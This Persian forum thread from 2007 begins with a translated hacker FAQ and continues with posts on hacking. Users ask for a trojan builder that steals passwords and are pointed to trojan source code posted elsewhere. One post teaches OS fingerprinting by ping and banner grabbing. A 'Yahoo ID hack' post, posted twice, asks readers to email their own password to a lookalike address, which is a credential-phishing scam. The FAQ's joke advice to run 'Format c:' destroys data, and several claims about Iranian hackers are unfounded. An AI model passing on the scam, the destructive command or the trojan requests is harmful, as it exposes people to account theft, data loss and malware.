ج: از زمانی که برای اولين بار اين مقاله را منتشر کردم، هر هفته چندين درخواست از افراد مختلف دريافت میکنم که از من میخواهند مهارتهای هکری را به آنها ياد بدهم. ولی متاسفانه من وقت و انرژی کافی برای اين کار ندارم. پروژههای هکری خود من و مسافرتهايم به عنوان يک مدافع جنبش منبع باز، ۱۱۰٪ از وقت مرا میگيرد. حتی اگر وقت هم داشته باشم، هکری يک طرزفکر است و مهارتها را بايد خودتان ياد بگيريد.
شما خواهيد ديد که هکرهای واقعی همواره میخواهند به شما کمک کنند اما اگر از آنها بخواهيد که تمام چيزهايی را که در مورد هکری بلدند را به شما ياد بدهند، آنها به درخواست شما اعتنايی نخواهند کرد. اول سعی کنيد که مهارتهايی را بدست آوريد. نشان دهيد که در حال سعی کردن هستيد و اينکه شما توانايی آنرا داريد که خودتان ياد بگيريد سپس از هکرهای ديگر يک سوال مشخص بپرسيد.
اگر شما میخواهيد برای راهنمايی گرفتن به يک هکر ميل بزنید، نکاتی وجود دارد که بايد از قبل آنها را بدانيد:
اولاً ما متوجه شديم افرادی که در نوشتن نامههای خودشان کمتوجه هستند، معمولاً در فکر کردن نيز بیدقت تر از آن هستند که بتوانند يک هکر خوب بشوند. پس دقت کنيد تا کلمات را با املای صحيح بنويسيد و دستور زبان را درست به کار برده و از نشانهگذاری خوب استفاده کنيد. در غير اينصورت احتمالاً به درخواست شما توجهی نخواهد شد.
ثانياً هيچگاه درخواست نکنيد که جواب شما به آدرسی فرستاده شود که با آدرس ايميلی که شما از آن نامه را فرستادهايد، متفاوت است. افرادی که چنين کارهای را انجام میدهند، معمولاً کسانی هستند که از حسابهای دزديده شده استفاده میکنند و ما علاقهای نداريم که به دزدها کمک کنيم.
س: چگونه میتوانم شروع کنم؟
ج: بهترين روش برای آغاز رفتن به جلسات گروه کاربران لينوکس است. شما میتوانيد چنين گروههايی را در صفحهی اصلی اطلاعات لينوکس (LDP) ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) پيدا کنيد. احتمالاً يکی از اين گروهها در نزديکی شما قرار دارد و شايد به يک کالج يا دانشگاه وابسته باشد. اگر از اعضای گروه بخواهيد، به شما يک لينوکس میدهند و مطمئناً به شما در نصب و راهاندازی آن کمک خواهند کرد.
س: چه وقت بايد شروع کنم؟ آيا سن من برای يادگيری بالاست؟
ج: در هر سنی که مشا قصد داريد شروع کنيد،يک سن خوب است. اکثر افراد در بازه سنی۱۵ تا ۲۰ سال علاقهمند میشوند ولی من استثنائاتی را در هر در دو جهت میشناسم.
س: چه مقدار طول میکشد تا من هکری را ياد بگيرم؟
ج: اين بستگی به مقدار هوش و پشتکار شما دارد. اکثر افراد اگر بر روی اين موضوعات تمرکز کنند، مهارتهای مورد انتظار را در طی ۱۸ ماه تا ۲ سال بدست میآورند. اما فکر نکنيد که تصور شما به همين جا ختم میشود. اگز شما يک هکر واقعی باشيد، مابقی عمرتان را به يادگيری و بهتر نمودن مهارتهايتان اختصاص خواهيد داد.
س: آيا ويژوال بيسيک و سیشارپ زبانهای برنامهنويسی خوبی برای شروع یادگيری هستند؟
ج: اگر شما چنين سوالی را میپرسيد، مطمئناً به اين معنی است که شما قصد داريد که هکری را تحت ويندوز ياد بگيريد. اين ايده به خودی خود بد است. هنگامی که من سعی برای هک کردن تحت ويندوز را با سعی برای يادگيری رقص در لباس شوالیه، مقايسه کردم، شوخی نمیکردم. به طرف ويندوز نرويد چون خيلی بد است و هيچوقت خوب نخواهد شد.
مشکلات خاصی در رابطه با ويژوال بيسيک و سیشارپ وجود دارد. مهمترينشان اين است که کد توليد شده توسط آنها حملپذير نيست (قابل اجرا در سيتم عامل ديگری نيست). گرچه نمونههای اوليهای از نرمافزارهای منبعباز توسط آنها نوشته شده است، اما استانداردهای ECMA به جز دستهی کوچکی از خصوصيات رابط کابری آنها از بقيه پشتيبانی نمیکند. تحت ويندوز اکثر پشتيبانی کتابخانهای دادهها به يک شرکت خاص (مايکروسافت) تعلق دارد.
اگر شما کاملاً مراقب امکاناتی که از آنها استفاده میکنيد -بيشتر از آنچه يک فرد مبتدی میتواند- نباشيد، به طور قطع سرانجام در يکی از سکوهايی که مايکروسافت از آنها پشتيبانی میکند، محدود خواهيد شد. اما اگر شما با يونيکس آغاز بکنید، زبانهای برنامهنويسی خيلی بهتری با کتابخانههای بهتری خواهيد داشت.
ويژوال بيسيک فوقالعاده مزخرف است و مانند بيسيکهای ديگر زبانی است که طراحی بسيار ضعيفی دارد و شما را به روشهای غلط در برنامهنويسی عادت میدهد. از من نخواهيد که جزئيات آن را شرح دهم. اين توضيحات صفحات يک کتاب را پر میکنند. به جای بيسيک يک زبان برنامهنويسی خوب طراحی شده را ياد بگيريد.
يکی از عادتهای بد وابسته شدن به ابزار کتابخانهای و لوازم توسعهی يک شرکت خاص است.
اساساً هر زبانی که به طور کامل حداقل توسط لينوکس يا يکی از BSD ها پشتيبانی نشود و يا حداقل تحت سيستمعاملهای سه شرکت متفاوت کار نکند، يک زبان ضعيف برای هکری است.
mazi_z_PSP
24-05-2007, 22:10
اینا پرسش هايی هستش که کاربران از نقاط مختلف جهان فرستادن و جواب داده شده . فکر کردم گزاشتنش خالی از لطف نباشه
mazi_z_PSP
24-05-2007, 22:11
س: آيا شما به من کرک کردن را ياد میدهيد يا به من کمک میکنيد تا يک سيستم را کرک کنم؟
ج: نه! هر کسی که بتواند بعد از خواندن اين متن بتواند اين پرسش را بپرسد، احمقتر از آن است که تعليم داده شود. حتی در صورتی که من برای آموزش وقت داشتم. اگر من ايميلی با چنين درخواستی دريافت کنم، به آن توجه نخواهم کرد يا با بی ادبی زياد به آن پاسخ خواهم داد.
س: چگونه میتوانم کلمهی عبور شخص ديگری را بدست آورم؟
ج: اين کرک کردن است.
س: من چگونه میتوانم ايميلهای افراد ديگری را بخوانم يا کنترل کنم؟
ج: اين کرک کردن است.
س: چگونه میتوانم مجوز اپراتوری را در شبکههای IRC بدست بياورم؟
ج: اين کرک کردن است.
س: من کرک شدهام. آيا شما میتوانيد به من کمک کنيد تا جلوی حملات بعدی را بگيرم؟
ج: نه تابحال هر وقت که چنين پرسشی از من پرسيده شده است، از طرف افرادی بوده که از ويندوز استفاده میکردند. هرگز امکان ندارد که به طور کامل ويندوز را بر ضد حملات کرکرها مصون ساخت. کدها و معماری آن اساساً دارای نقاط ضعف زيادی است که تلاش برای ايمن کردن ويندوز را به تلاش برای خالی کردن يک قايق با آبکش تبديل میکند. تنها روش قابل اعتماد برای جلوگيری از حملات کرکرها مهاجرت به لينوکس يا سيستمعامل ديگری است که طراحی آن حداقل قابليت ايمن سازی را داشته باشد.
س: من با نرمافزاری در ويندوز مشکل دارم. آيا شما به من کمک میکنيد؟
ج: بله! به اعلان داس برويد و "Format c:" را نوشته Enter بزنيد. تمام مشکلاتی که تابحال داشتهايد در طی چند دقيقه برطرف خواهدشد.
س: در کجا میتوانم هکرهای واقعی را برای بحث پيدا کنم؟
ج: بهترين راه يافتن يک گروه کاربران يونيکس (يا لينوکس) در نزديکی محل زندگی شما و رفتن به جلسات آنهاست. (شما میتوانيد لينکهايی به فهرستهای متعددی از گروههای کاربران را در سايت LDP ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) واقع در ibiblio بيابيد)
در گذشته من گفته بودم که شما هيچ هکر واقعی را در IRC نخواهيد يافت. ولی اين موضوع اکنون تغيير کرده است. گروههايی از هکرهای واقعی که به مسائلی مانند GIMP و Perl علاقهمندند اکنون صاحب کانالهای IRC هستند.
س: آيا شما میتوانيد کتابهايی مفيد در زمينهی هک و موارد مرتبط به من معرفی کنيد؟
ج: من گردانندهی فهرست راهنماهای لينوکس ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) هستم که ممکن است به درد شما بخورد. Loginataka ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نيز ممکن است برای شما جالب باشد.
برای آشنايی با پايتون، مطالب نوشته شده در سایت پايتون ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد.
س: آيا برای هکر شدن لازم است رياضيات خوبی داشته باشم؟
ج:نه. هکری از رياضيات و جبر، کم استفاده میکند. بخصوص شما معمولاً به مثلثات، حساب ديفرانسيل و انتگرال و آنالبز عددی نيازی نداريد. (استثناهايی در اين مورد در زمينهی برخی از کاربردهای خاص کامپيوتر مانند گرافيک کامپيوتری وجود دارد.)
دانستن منطق مجرد و جبر بولی خوب است. برخی از شاخههای رياضيات متناهی (مانند تئوری مجموعههای متناهی، ترکيبيات و تئوری گرافها) نيز میتواند مفيد باشد. مهمتر از همه شما بايد توانايی تفکر منطقی و دنبال کردن حلقههايی با حالات مشخص را مانند رياضيدانان داشته باشيد. گرچه بيشتر شاخههای رياضيات به شما کمکی نخواهند کرد، اما شما به نظم و هوشياری برای به کار بردن رياضيات نياز داريد. اگر شما هوش کمی داريد، اميد چندانی برای هکر شدن شما وجود ندارد. اما اگر شما انظباط کمی داريد، بهتر است که آن را زياد کنيد.
به نظر من يکی از راههای خوب برای فهميدن اينکه شما توانايی آن را داريد يا نه، تهيهی يک کپی از کتاب ?What is the name of this book (اسم اين کتاب چيست؟) نوشتهی Raymond Smullyan است. معماهای سرگرم کنندهی اين کتاب به روح هکری بسيار نزديک هستند. توانايی حل آنها نشانهی خوبی است ولی لذت بردن از حل آنها بهتر است.
س: بايد اول کدام زبان برنامهنويسی را ياد بگيرم؟
ج: XHTML (جديدترين نسخهی HTML). اگر شما از قبل آن را نمیدانيد، تعداد بسيار زيادی کتاب با ظاهر فريبنده، بيش از حد فشرده و بد و متاسفانه تعداد کمی کتاب خوب برای HTML وجود دارد. يکی از کتابهايی که من بيشتر دوست دارم HTML: The Definitive Guide ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) است.
اما HTML يک زبان کامل برای برنامهنويسی نيست.اگر آمادهی شروع برنامهنويسی هستيد، من توصيه میکنم با پايتون ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) شروع کنيد. مطمئناً شما افراد زيادی را خواهيد ديد که پرل را توصيه میکنند. مسلماً پرل هنوز پرطرفدارتر از پايتون است.اما پرل (به نظر من) برای يادگيری سختتر و طراحی پايتون از آن بهتر است.
زبان سی بسيار مهم است اما از پايتون و پرل بسيار سختتر است. به عنوان اولين زبان برنامهنويسی سعی نکنيد آن را ياد بگيريد.
اگر شما کاربر ويندوز هستيد، به ويژوال بيسيک قانع نشويد. ويژوال بيسيک شما را به روشهای بد برنامهنويسی عادت میدهد و قابل انتقال به سکوی ديگری نيست. از آن دوری کنيد.
س: برای هکر شدن به چه نوع سختافزاری نياز دارم؟
ج: در گذشته کامپيوترهای شخصی تقريباً کم قدرت بودند و حافظهی ضعيفی داشتند که اينها محدوديتهای خارجی را به روند يادگيری هکرها تحميل میکردند. اما از چند وقت پيش ديگر اينگونه نيست. هر سيستم بالاتر از 486DX50 برای کارهايی مانند توسعهی نرمافزارها، اجرای X Window و ارتباطات اينترنتی به قدر کافی قدرتمند است. کوچکترين هارد ديسکی که امروزه میتوانيد تهيه کنيد، به قدر کافی بزرگ است.
مهمترين مسئلهای که بايد در انتخاب يک سيستم بدانيد اين است که آيا سختافزار آن با لينوکس (يا BSD، اگر بخواهيد از آن استفاده بکنيد) سازگاری دارد يا نه. اين نيز برای اکثر سيستمهای جديد صادق است. تنها قسمت مشکلساز در اين زمينه مودم است. بعضی از سيستمها سختافزارهای مخصوص ويندوز دارند که با لينوکس کار نمیکند.
يک فهرست پرسشهای متداول در مورد سازگاری سختافزارها وجود دارد. اين ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) جديدترين نسخهی آن است.
س: من میخواهم در يکی از پروژهها همکاری کنم. آيا شما میتوانيد در انتخاب يک پروژه به من کمک کنيد؟
ج: نه! به دليل آنکه من ميزان هوش و علاقهمندی شما را نمیدانم.شما بايد خودتان انگيزهی لازم را برای اين کار داشته باشد در غير اينصورت آن را انجام نخواهيد داد. اگر فرد ديگری مسيری را برای شما انتخاب کند، در اکثر موارد نتيجهای نخواهد داشت.
اين روش را امتحان کنيد: اطلاعيهی پروژههايی که توسط Freshmeat ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) منتشر میشود را برای چند روز مرور کنيد. هنگامی که يکی از آن ها به نظرتان جالب آمد و دوست داشتيد که روی آن کار کنيد، به پروژه بپيونديد.
س: آيا لازم است من از مايکروسافت متنفر باشم و سعی کنم به آن ضربه بزنم؟
ج: نه نيازی نيست. من نفرت انگيز بودن مايکروسافت را انکار نمیکنم اما فرهنگ هکرها بسيار پيش از مايکروسافت وجود داشته و مدتها بعد از آن نيز وجود خواهد داشت. بهتر است آن انرژی که میخواهيد بر روی نفرت از مايکروسافت میخواهيد صرف کنيد، را بر روی دوست داستن هنرتان صرف کنيد و کدهای خوبی بنويسيد. اين بدون آنکه از شخصيت شما بکاهد، به حد کافی به مايکروسافت ضربه میزند.
س: مگر نرمافزارهای منبعباز، درآمد برنامهنويسان را از آنها نمیگيرند؟
ج: به نظر میآيد که اينگونه نباشد. تابحال شرکتهای نرمافزاری منبعباز بيشتر از بيکار کردن افراد، موقعيتهای شغلی ايجاد کردهاند. اگر سفارش دادن برنامه برای نوشته شدن يک اقتصاد شبکهای است، دست گشيدن از اين کار باعث میشود که آن نرمافزار نوشته نشود. يک برنامهنويس حقوق خودش را -مستقل از اينکه برنامه پس از نوشته شدن قرار است منبعباز باشد يا نه- میگيرد. مهم نيست که چه مقدار نرمافزارهای رايگان نوشته میشوند. همواره نرمآفزارهای جديد و سفارشی مورد نياز است. من در صفحههای منبعباز ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) در اين مورد بيشتر نوشتهام.
س: چگونه بايد شروع کنم؟ از کجا میتوانم يک لينوکس رايگان بدست آورم؟ ج: من در قسمتهای مختلفی از اين صفحه به محلهايی که میتوانيد از آنها يونيکسهای رايگان متداول را پيدا کنيد، اشاره کردهام. برای هکر شدن شما به انگيزه، ابتکار و توانايی يادگيری بدون معلم نياز داريد. از همين الان شروع کنيد...
تکنیک برتر
25-05-2007, 03:52
البته دوستان تا اونجايی که من اطلاع دارم يکی از بزرگ ترين کشور های جهان تو هک روسيه هستش.و این رو هم ميدونم که نسخه های اوليه برنامه های معروف مثل ويستا تو این کشور هک ميشن.
حرف شما متین ولی روسیه تعداد نفراتش کرمتر از ایرانه یعنی از 1 میلیون جمعید فقط 10هزار نفرشون اینکاره ان تازه از 10 هزار نفر 10 نفرشون می تونن ویستارو هک کنند روسیه با رنگ زرد درست رنگ شده یعنی قرمز اصل نارجنی دوم زرد سوم یعنی روسیه زرد مثلا ایران نه کل کشور بلکه فقط تهرا ن از 5 میلیون نفر 4 میلیونش طریقه هک و بلدن حالا در چه زمینه ای ایران در سالهای قبل 75 بزرگترین صادر کننده نرم افزار بود ولی بعد از اینکه سازمان بینلل مللی اعلام کرد که نرم افزار های ایرانی ویروسی هستند از صادر نرم افزار منع شد و مردم ایران شروع به هک و ویروس نویسی کردن به نظر شما کدوم کشور تو آنتی ویروس نویسی اول فکرشم به ذهنتون نمیرسه ایران بله اگه به ایران اجازه صادر کنن ایران تو جهان اول می شه الان در تمامی شرکت های دولتی ایران از آنتی ویروس های ایرانی استفاده می شه می دونی چرا چون هیچ ویروسی از دست اونا در نمی ره تمامی شرکتهای آنتی ویروس نویسی حداقل 10 تا از کارمنداشون ایرانین چون از 100% ویروس های منتشر شده 55% مال ایرانه ؟!!!
مثال از هک نوجوان 15 ساله 250 میلیون تومان از حصابی به حصاب پدرش واریز کرد . مرد آذربایجانی با کارت تلفن که روش برنامه ریزی کرده بود از آبربانکها پولهای کلانی برداشت کرد.
پسر نوجوان 17 ساله حصاب بانکی جابجا کرد .و.........
نتیجه گیری کنید اگه آمریکایی بخواد اینکارو بکنه با دستگاهای رمز خوان به سراغ آبر بانکها میره نه با کارت تلفن برنامه ریزی شده مثلا 10 تا هکر بزرگ جهان این دستگا هو اختراع کردن و چجوری دست مردم چرخیده .... و همه استفاده کردن و یک سری از کشورها مثل ایران می گن آمریکا همشون هکرن هکر به کسی میگن که خود هک کنه نه از ابداعات دیگران استفاده کنه.
mazi_z_PSP
25-05-2007, 13:13
صد در صد که این طور هست تکنيک جان.حتی اگر مايکروسافت به ایران برايه هک شک نميکرد اونها راهت تر ميتونستند ويستا رو تو کشور هک کنن و خودکفا بشن!! راستی این که گفتی ایرانی ها از آنتی ويروس های خودی استفاده ميکنن برام جالب شد.ميشه اسمشون رو بگی؟ البته این رو ميدونم که تمام شرکت های ایرانی از برنامه های حساب داری خودی استفاده ميکنن که بسيار خوب هم عمل ميکنن اما قيمت بالايی دارن.و این مسأله در مورد آنتی ويروس هم همينطوره نه؟ منظورم اینه که برای این شرکت ها استفاده از آنتی ويروس های خارجی مثل McAfee و Bitdefender و Kaspersky به صرفه تر نيست؟
mazi_z_PSP
25-05-2007, 13:15
البته ایرانی ها در مساءل هک و کلاه گزاری و .... سر آمده همه هستن چون نبوغ و خلاقيت مثال زدنی دارن.که من به این موضوع واقعا افتخار ميکنم
تکنیک برتر
26-05-2007, 04:12
سلام اجازه نام بردن اسم ندارم ولی در همین حد بگم که McAfee و Bitdefender و Kaspersky توجیب بقلش جا می گیره یه آنتی ویروسی تقریبا 2 ساله وارد باز ایران شده که ایرانی هم است اسمشو یادم نیست ولی قیمتش زیاده ولی عملا کار سازه.
salar2010
26-05-2007, 07:06
یه خواهش داشتم که خیلی حیاتیه !
اقا من به یک تروجان میکر نیاز دارم ! البته نه به سورسش فعلا به خود برنامه نیاز دارم اخه یه کشف باورنکردنی کردم !!! که بعدا به همتون اموزش میدم الان چیزی که من نیاز دارم اینه که یک کسی لطف کنه و یک تروجان میکر از همین ها که پسورد و یورز طرف رو واسمون ارسال میکنن ! خدایی خیلی لازم دارم حداقل چیزی باشه که حجم فایلی که می سازه کم باشه ! و حداقل خودشون از کاردکردش مطمعن باشه
به هرحال من منتظرم و درضمن اگه تونستید حتما بهم پیام خصوصی بفرستید
موفق باشید
mazi_z_PSP
26-05-2007, 12:48
یه خواهش داشتم که خیلی حیاتیه !
اقا من به یک تروجان میکر نیاز دارم ! البته نه به سورسش فعلا به خود برنامه نیاز دارم اخه یه کشف باورنکردنی کردم !!! که بعدا به همتون اموزش میدم الان چیزی که من نیاز دارم اینه که یک کسی لطف کنه و یک تروجان میکر از همین ها که پسورد و یورز طرف رو واسمون ارسال میکنن ! خدایی خیلی لازم دارم حداقل چیزی باشه که حجم فایلی که می سازه کم باشه ! و حداقل خودشون از کاردکردش مطمعن باشه
به هرحال من منتظرم و درضمن اگه تونستید حتما بهم پیام خصوصی بفرستید
موفق باشید
دوست عزيز اینجا نميتونيم برنامه از پيش ساخته شده بهت بديم اما آموزش ساخت و سورس رو ميتونيم.اگر سورس کد يه تروجان رو ميخوای ميتونی تو تاپيک ويروس و آنتی ويروس نويسی بگيری که تو يکی از صفحاتش به صورت پی دی اف هستش
mazi_z_PSP
26-05-2007, 12:49
يک سری نکات و آموزش برايه نرم افزار Snifer پيدا کردم که موقعی که وقت کردم همشو ميزارم.Please wait...
mazi_z_PSP
26-05-2007, 20:46
شناسایی سیستم عامل سرورها
خوب وقتی ما به خواهیم به یه سرور حمله کنیم باید بدونیم مه اون سرور از چی ساخته شده البته ما میتونیم از این روش هایی که میگم
برای هک سیستم های شخصی استفاده کنیم خوب بحث رو شروع میکنم:
روش شناسایی TTL:
این روش رو همتون میشناسید بله استفاده از فرمان PING است خوب وقتی شما یه SERVER رو pING میکنید
یک سری بسته هایی به SERVER از سیستم شما فرستاده میشود که ما در جواب این بسته ها یه سری اطلاعات میگیریم
فرمان PING را من روی یه سیستم شخصی امتحان کردم به این شکل میدهد:
فرمول pING: PING +IP
C:\WINDOWS (file:///C:/WINDOWS)> PING 203.168.117.8
REPLY FROM 203.168.117.8:BYTES=32TIME< 1MS TTL=128
REPLY FROM 203.168.117.8:BYTES=32TIME< 1MS TTL=128
REPLY FROM 203.168.117.8:BYTES=32TIME< 1MS TTL=128
خوب ما با بقییه جملات کاری نداریم فقط فهمیدیم که مقداره TTL=128 هستش یعنی سیستم عامل ویندوز هست
من TTL های سیتم های عامل رو براتون گذاشتم نگاه کنید(VERSIAN OF TTL)
WINDOWS 9X/NT INTEL =32
WINDOWS 2000 INTEL =128
DIGITALUNIX 4.0 ALPA =60
UNISYS XMAINFRAME =64
LINUX 2.2X INTEL =64
FTX (UNIX) 3.3STRTUS =64
SCO COMPAQ =64
NETWARE 4.11 INTEL =128
AIX 4.3X IBM/R6000 =60
AIX 4.2 IBM/R6000 =60
CISCO 11.2 =7507 60
CISCO 12.02 =514255
IRIX 6.0 SGI =60
نکته: مقداره TTL در هر ROUTER به یک میزان کم میشود ما برای اینکه تعداد ROUTER
ها رو با استفاده از فرمان TRACE در DOS به فهمیم این دستور این است
C:/WINDOS> TRACERT IP
نقاط ضعف این روش: 1)یه سرور میتونه TTL جعلی بسازه 2)TTL هافقط نوع سیتم عامل را میدهند
و VERSION سیتم عامل را به ما نمی دهد مثلا LINUX RED-HAT 6.1,LINUX RED HAT 72
3) سیتم هایی که فایر وال دارند قابل PING شدن نیستند
روش BANNER GRABBING :
هر WEB SEVERیا FTP SERVER به طور پیش فرض یه سرتیتر به نام BANNER داردکه
ما با گرفتن BANNER یک SERVER میتونیم به نسخه عامل ان پی ببریم مثلا اگه ما SEVER
TELNET کنیم میدهد
خوب من الان میخام به SERVER سایت INSECURD.ORG
TELNET> TELNET INSECRUD.ORG.80
connect to insecurd.org......
get index.html(or anything) [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
host:server (or anything)
content-lenght: 10(or anything
hhtp/1.1 400 bad reqoust
date:tue,16 november 2002 11.30.00 gmt
server:apache/2.00.39(unix) mod-perl/1.99-04-devperl/v 5.6.1
content-lenght:386
connection:close
نقاط ضعف روش baner grabbing:la; مشکل این رئش این است که یک مدیر سایت میتواند تمام BANNER ها رو
حذف کند من البته از این روش زیاد استفاده کردم خوب جواب میده
روش انگشت نگاری (FINGERPRINTING METHOD)"
بهترین روش شناساییست که با استفاده از ظبط بسته های ارسالی از کامیوتر مقصدوثبت فاصله زمانی و دریافت پیام
خطا و..... شناسایی کنیم و 4 روش دارد 1)FEATURES OF TCP IMPLEMENTATION
2)ICMP ERROR MESSAGE QUENCHING
3)SNIFING DATA PACKETS
4) INITIAL SEQUNCE NUMBER SAMPELING
راستی بروبچ من روش SNIFING رو توصیه میکنم براتو اگه شد یه SNIFER توپ میذارم
mazi_z_PSP
26-05-2007, 20:49
هك ايدي
در روزهای اخیر یکی از دوستام در مشهد یک اشکالی (BUG) درسیستم
پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) کشف کرد که هنوز توسط یاهو پیدا نشده بنابرین شما باید هر چه سریع تر از این اشکال سو استفاده کنید.
ما برای سو استفاده از چه روشی استفاده خواهیم کرد؟
ما برای گرفتن پسورد از روش سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) استفاده می کنیم و خود را یک مستر(MASTER) معرفی می کنیم و به سیستم فرمان می دهیم که پسورد ما را غیب کند(Hidden) و دوباره برای ما نشان دهد (Show) و بفرستد و در بین این کار از اشکال (BUG) باید سو استفاده کنیم. ما پسورد و ID خود را به آن میدهیم و ایمیل را به شخصی که می خواهیم پسورد را بدست آوریم تغییر می دهیم در نتیجه سیستم به اشتباه پسورد قربانی را به ما می فرستد. به همین سادگی!!!!
مزیت این روش: بدون تعلیمات و دانش قبلی می توانید به راحتی پسورد یک نفر را بدست آورید و نیازی به برنامه ندارد!
بدی این روش: البته نمی شه گفت بدی.مدت زمانی که پسورد را به شما میدهد بستگی به تعداد نامه هایی که به در سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) هست.برای جواب دادن به هر نامه حدود 1 دقیقه طول می کشد.حالا خودتون میتوانید حساب کنید نامه ی پسورد خود را کی پس میگیرید.
روش(بخش اصلی):
1.برید تو ایمیل خود و تو قسمت Compose.
2.در قسمت TO باید ایمیل سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) را بنویسید که هست>>>>cookies_pasword@yahoo.com<<<<<<
3.در Subject ایمیل کامل خود را بنویسید(ID@yahoo.com (ID@yahoo.com)).
4.کدی که کمی پایین تر پیدا میکنید کپی COPY کنید و داخل پیغام خود PASTE کنید.(اول کپی کنید بعد تغییر دهید)
5.حالا باید در کد کمی تغییر ایجاد کنیم.
6.بعد از قرار دادن کد داخل پیغام و در عوض کردن قسمت هایی که از شما (YahooID قربانی,پسورد شما,YahooID شما) خواسته شده کار شما تمام می شود.
7.حالا دکمه ی SEND را بنویسید.
این کد
(/cgi-bin/start?v703&login.{YahooID قربانی}=passmachine&class=supervisor&f={پسورد شما}&f=27586&{YahooID شما}=ACTIVE&rsa)
mazi_z_PSP
26-05-2007, 21:05
راستی دوستان.من خودم به مشکلی کوچک و ساده برخوردم.تو يکی سايت هايی که رفته بودم وقتی ميخواستم مطالبش رو بگيرم اما نميشد يعنی رنگش برای کپی پيست عوض نميشد ميشه کمک کنين؟
bad_boy_2007
27-05-2007, 18:51
از منو view گزینه source رو انتخاب کن متن رو کپی کن بنداز تو frontpage (در حالت html) بعد کپی و past عادی کن . یه راه دیگش اینه که با پسوند .doc ذخیره اش کنی (مستقیم از طریق notepad) ولی همیشه خوب جواب نمیده
بحثت رو به سمت برنامه نویسی ببری بهتره فکر کنم مقدماتت خیلی طولانی شده :20:
موفق باشی
mazi_z_PSP
27-05-2007, 20:20
از منو view گزینه source رو انتخاب کن متن رو کپی کن بنداز تو frontpage (در حالت html) بعد کپی و past عادی کن . یه راه دیگش اینه که با پسوند .doc ذخیره اش کنی (مستقیم از طریق notepad) ولی همیشه خوب جواب نمیده
بحثت رو به سمت برنامه نویسی ببری بهتره فکر کنم مقدماتت خیلی طولانی شده :20:
موفق باشی
عزيز جان اینا هم برای هک و برنامه نويسی هستش . هرکی بخواد از اینا ميتونه تو زبانی که ياد داره استفاده کنه.مخصوصا ويبی
bad_boy_2007
28-05-2007, 14:40
اگه یکم سورس بدی یا اینکه آموزشت رو به سمت مباحث عملی سوق بدی بهتره :46:
mazi_z_PSP
29-05-2007, 11:07
اگه یکم سورس بدی یا اینکه آموزشت رو به سمت مباحث عملی سوق بدی بهتره :46:
الان زياد وقت سر زدن ندارم اونم با این اینترنت از آشغال بدتر اما بعد از خردان رو چشم
f-secure
29-05-2007, 21:59
هك ايدي
در روزهای اخیر یکی از دوستام در مشهد یک اشکالی (BUG) درسیستم
پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) کشف کرد که هنوز توسط یاهو پیدا نشده بنابرین شما باید هر چه سریع تر از این اشکال سو استفاده کنید.
ما برای سو استفاده از چه روشی استفاده خواهیم کرد؟
ما برای گرفتن پسورد از روش سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) استفاده می کنیم و خود را یک مستر(MASTER) معرفی می کنیم و به سیستم فرمان می دهیم که پسورد ما را غیب کند(Hidden) و دوباره برای ما نشان دهد (Show) و بفرستد و در بین این کار از اشکال (BUG) باید سو استفاده کنیم. ما پسورد و ID خود را به آن میدهیم و ایمیل را به شخصی که می خواهیم پسورد را بدست آوریم تغییر می دهیم در نتیجه سیستم به اشتباه پسورد قربانی را به ما می فرستد. به همین سادگی!!!!
مزیت این روش: بدون تعلیمات و دانش قبلی می توانید به راحتی پسورد یک نفر را بدست آورید و نیازی به برنامه ندارد!
بدی این روش: البته نمی شه گفت بدی.مدت زمانی که پسورد را به شما میدهد بستگی به تعداد نامه هایی که به در سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) هست.برای جواب دادن به هر نامه حدود 1 دقیقه طول می کشد.حالا خودتون میتوانید حساب کنید نامه ی پسورد خود را کی پس میگیرید.
روش(بخش اصلی):
1.برید تو ایمیل خود و تو قسمت Compose.
2.در قسمت TO باید ایمیل سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) را بنویسید که هست>>>>cookies_pasword@yahoo.com<<<<<<
3.در Subject ایمیل کامل خود را بنویسید(ID@yahoo.com (ID@yahoo.com)).
4.کدی که کمی پایین تر پیدا میکنید کپی COPY کنید و داخل پیغام خود PASTE کنید.(اول کپی کنید بعد تغییر دهید)
5.حالا باید در کد کمی تغییر ایجاد کنیم.
6.بعد از قرار دادن کد داخل پیغام و در عوض کردن قسمت هایی که از شما (YahooID قربانی,پسورد شما,YahooID شما) خواسته شده کار شما تمام می شود.
7.حالا دکمه ی SEND را بنویسید.
این کد
(/cgi-bin/start?v703&login.{YahooID قربانی}=passmachine&class=supervisor&f={پسورد شما}&f=27586&{YahooID شما}=ACTIVE&rsa)
با عرض معذرت من كه هيچي از قسمت آموزش آخر پستت حاليم نشد بقيه رو نمي دونم
دقيق تر بنويس يا عكس بذار
f-secure
29-05-2007, 22:47
ما پسورد و Id خود را به آن میدهیم و ایمیل را به شخصی که می خواهیم پسورد را بدست آوریم تغییر می دهیم
اين يعني چي؟من كه پاك گيج شدم
راستي اگه كسي گفت چرا ما ايراني ها فقط بلديم تكست بزنيم بدون تصوير و توضيح بيشتر يك جايزه داره
mazi_z_PSP
29-05-2007, 23:17
